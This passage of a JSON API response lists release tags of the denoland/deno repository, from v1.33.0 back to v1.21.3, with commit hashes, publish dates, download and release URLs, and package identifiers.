_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repo